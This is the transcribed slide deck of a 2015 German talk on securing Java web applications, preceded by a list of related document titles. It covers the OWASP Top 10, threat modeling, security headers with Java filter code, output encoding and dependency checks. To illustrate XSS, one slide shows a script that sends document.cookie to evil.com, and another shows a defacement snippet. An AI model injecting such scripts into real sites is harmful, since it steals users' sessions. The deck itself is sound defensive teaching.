Sichere Webanwendungen mit Java

Similar documents
Real World Java Web Security

Security starts in the head(er)

Java Web Security Antipatterns

Secure development and the SDLC. Presented By Jerry

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

AppSec USA 2014 Denver, Colorado Security Header Injection Module (SHIM)

Recent Advances in Web Application Security

Sichere Software- Entwicklung für Java Entwickler

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Magento Security and Vulnerabilities. Roman Stepanov

Where every interaction matters.

Protecting Web Applications and Users

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

(WAPT) Web Application Penetration Testing

Enterprise Application Security Workshop Series

Web Application Security

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

What is Web Security? Motivation

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Criteria for web application security check. Version

OWASP Top Ten Tools and Tactics

Web Application Security Assessment and Vulnerability Mitigation Tests

Web application security

OWASP AND APPLICATION SECURITY

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

APPLICATION SECURITY AND ITS IMPORTANCE

How To Understand And Understand The Security Of A Web Browser (For Web Users)

Adobe Systems Incorporated

OWASP TOP 10 ILIA

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Testing the OWASP Top 10 Security Issues

Security features of ZK Framework

Check list for web developers

Data Breaches and Web Servers: The Giant Sucking Sound

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Cloud Security:Threats & Mitgations

elearning for Secure Application Development

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

How To Fix A Web Application Security Vulnerability

Intrusion detection for web applications

Sitefinity Security and Best Practices

Web Application Vulnerability Testing with Nessus

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

The Top Web Application Attacks: Are you vulnerable?

Still Aren't Doing. Frank Kim

Securing your Web application

Project 2: Web Security Pitfalls

Hack Proof Your Webapps

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Hacking de aplicaciones Web

Web Application Security

Web Application Security

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Secure Coding in Node.js

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

Auditing Web Applications

Introduction to Computer Security

WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6

We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013

Secure Programming Lecture 12: Web Application Security III

Web Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc

Cross Site Scripting in Joomla Acajoom Component

JVA-122. Secure Java Web Development

Web Application Guidelines

Web-Application Security

IJMIE Volume 2, Issue 9 ISSN:

Protecting Your Organisation from Targeted Cyber Intrusion

Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Ethical Hacking as a Professional Penetration Testing Technique

Web Application Penetration Testing

OWASP Application Security Building and Breaking Applications

Relax Everybody: HTML5 Is Securer Than You Think

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Nuclear Regulatory Commission Computer Security Office Computer Security Standard

Web Application Firewall on SonicWALL SSL VPN

Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

Pentests more than just using the proper tools

Thomas Röthlisberger IT Security Analyst

Hardening Moodle. Concept and Realization of a Security Component in Moodle. a project by

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Application Security Vulnerabilities, Mitigation, and Consequences

MatriXay WEB Application Vulnerability Scanner V Overview. (DAS- WEBScan ) The best WEB application assessment tool

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

Web Application Report

Preparing for the Cross Site Request Forgery Defense

Transcription:

Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit

Patch fast Unsafe platform unsafe web application

Now lets have a look at the developers

OWASP TOP 10 2013 (1) Injection (2) Broken Authentication and Session Management (3) Cross-Site Scripting (XSS) (4) Insecure Direct Object References (5) Security Misconfiguration (6) Sensitive Data Exposure (7) Missing Function Level Access Control (8) Cross-Site Request Forgery (CSRF) (9) Using Components with Known Vulnerabilities (10) Unvalidated Redirects and Forwards

What scares others does not necessarily scare you!

OWASP TOP 10 Proactive Controls (1) Parameterize Queries (2) Encode Data (3) Validate All Inputs (4) Implement Appropriate Access Controls (5) Establish Identity and Authentication Controls (6) Protect Data and Privacy (7) Implement Logging, Error Handling and Intrusion Detection (8) Leverage Security Features of Frameworks and Security Libraries (9) Include Security-Specific Requirements (10) Design and Architect Security in

Secure Programming Design and Architect Security in

Presentation Security Services Domain Data Access

Applications need to be secure by design Threat model

Threat modeling key questions* 1. What are you building? 2. What can go wrong? 3. What should you do about those things that can go wrong? 4. Did you do a decent job of analysis in steps 1 to 3? * by Adam Shostack - Threat Modeling

Secure all data during transport

Log-in form requires HTTPS Link to a dedicated HTTPS log-in page HSTS to force HTTPS for whole page

@WebFilter(urlPatterns = {"/*"}) public class HSTS implements Filter { public void dofilter( ) { HttpServletResponse response = (HttpServletResponse) res; response.addheader( "Strict-Transport-Security", "max-age=31556926"); chain.dofilter(req, response); } // }

Combine security response headers HTTP Strict Transport Security (HSTS) Forces HTTPS connections Cache-Control Prevents storing sensitive data in browser cache X-Content-Type-Options Prevents drive-by downloads X-Frame-Options Prevents UI redressing attacks (clickjacking) Content Security Policy (CSP) Prevents Cross-Site Scripting

response.addheader( "Content-Security-Policy", "default-src 'none'; script-src *.sample.com; style-src sample.org; frame-ancestors 'none'" );

Defense in depth

Verify all headers in the browser

Recx Security Analyser

Cross-Site Scripting

XSS attacks Execute arbitrary code in browser Access victim s session credentials Website defacement Load remotely hosted scripts Redirects to phishing/ malware sites Data theft Undermine CSRF defense

Session Theft <script> var img = new Image(); img.src = "http://evil.com?" + document.cookie; </script>

Website Defacement <script> document.body.innerhtml("xss"); </script>

<

<

In which context will the (user) input be used? <script>alert("xss")</script> HTML <script>alert("xss")& lt;/script> CSS \3cscript\3e alert(\22xss\22)\3c \2fscript\3e JavaScript <script>alert(\x22xss\x22)<\/script>

OWASP Java Encoder String enchtml = Encode.forHtml(name); String enccss = Encode.forCssString(name); String encjs = Encode.forJavaScript(name);

<web-app... version="3.1"> <session-config> <!-- idle timeout after session expires --> <session-timeout>30</session-timeout> <cookie-config> <!-- prevent session id script access --> <http-only>true</http-only> <!-- transfer cookie via https only --> <secure>true</secure> </cookie-config> <!-- session id in cookie, not URL --> <tracking-mode>cookie</tracking-mode> </session-config> </web-app>

Hack yourself first

Hack yourself first Professional pentester

Frameworks and libraries decline

My code, my configuration And whose libs?

<reporting> <plugins><plugin> <groupid>org.owasp</groupid> <artifactid> dependency-check-maven </artifactid> <version>1.2.11</version> <reportsets><reportset> <reports> <report>aggregate</report> </reports> </reportset></reportsets> </plugin></plugins> </reporting>

Threat model Use OWASP Top 10 Proactive Controls as a guide and hack yourself first Keep your libraries (and everything else) up-to-date

BridgingIT GmbH Königstraße 42 70173 Stuttgart dominik.schadow@bridging-it.de www.bridging-it.de Blog blog.dominikschadow.de Twitter @dschadow Demo Projects github.com/dschadow/javasecurity Microsoft Threat Modeling Tool www.microsoft.com/en-us/sdl/adopt/ threatmodeling.aspx Mozilla SeaSponge air.mozilla.org/mozilla-winter-of-securityseasponge-a-tool-for-easy-threatmodeling OWASP Dependency Check www.owasp.org/index.php/ OWASP_Dependency_Check OWASP Java Encoder www.owasp.org/index.php/ OWASP_Java_Encoder_Project OWASP Top 10 2013 www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project OWASP Top 10 Proactive Controls www.owasp.org/index.php/ OWASP_Proactive_Controls Recx Security Analyser www.recx.co.uk/products/ chromeplugin.php Pictures www.dreamstime.com

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information